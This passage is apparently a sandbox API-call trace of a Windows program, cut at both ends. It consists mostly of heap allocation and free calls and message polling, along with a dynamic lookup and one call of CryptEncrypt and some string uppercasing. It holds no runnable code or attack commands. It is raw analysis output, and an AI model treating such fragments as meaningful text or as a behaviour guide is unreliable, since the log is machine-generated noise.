0x4 [0253.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0253.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0253.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0253.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0253.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0253.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0253.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0253.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0253.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0253.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0253.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0253.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0253.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0253.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0253.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0253.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0253.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0253.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa8f8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0253.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0253.724] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0253.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0253.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0253.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6558 [0253.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0253.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0253.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0253.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0253.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0253.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0253.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0253.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0253.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0253.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0253.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0253.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0253.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0253.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0253.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0253.725] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24b1728*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x24b1728*, pdwDataLen=0x8bef68*=0x8) returned 1 [0253.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0253.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0253.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0253.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0253.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0253.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0253.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0253.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0253.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0253.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0253.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0253.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0253.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0253.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0253.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0253.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0253.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0253.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0253.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0253.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0253.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0253.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0253.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0253.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0253.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0253.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0253.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0253.727] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0253.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0253.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0253.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0253.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0253.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0253.728] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.728] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0253.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0253.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0253.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0253.728] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0253.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0253.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0253.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0253.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0253.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0253.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0253.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0253.728] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0253.728] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0253.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0253.729] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0253.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0253.729] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0253.729] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0253.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0253.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0253.729] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0253.729] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.729] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0253.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0253.730] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0253.730] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0253.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0253.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0253.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0253.730] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0253.730] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.730] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0253.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0253.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0253.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0253.730] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.731] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0253.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0253.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0253.731] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0253.731] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0253.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0253.731] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0253.731] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.731] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0253.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0253.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0253.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0253.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0253.732] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.732] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.732] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0253.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0253.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0253.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.732] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.732] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.732] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0253.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0253.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.733] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0253.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0253.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0253.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0253.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0253.733] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0253.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0253.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0253.733] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0253.733] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0253.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0253.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0253.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0253.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0253.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0253.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0253.734] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0253.734] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0253.734] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0253.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0253.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0253.734] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.734] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0253.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0253.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0253.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0253.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0253.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.735] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0253.735] CharUpperBuffW (in: 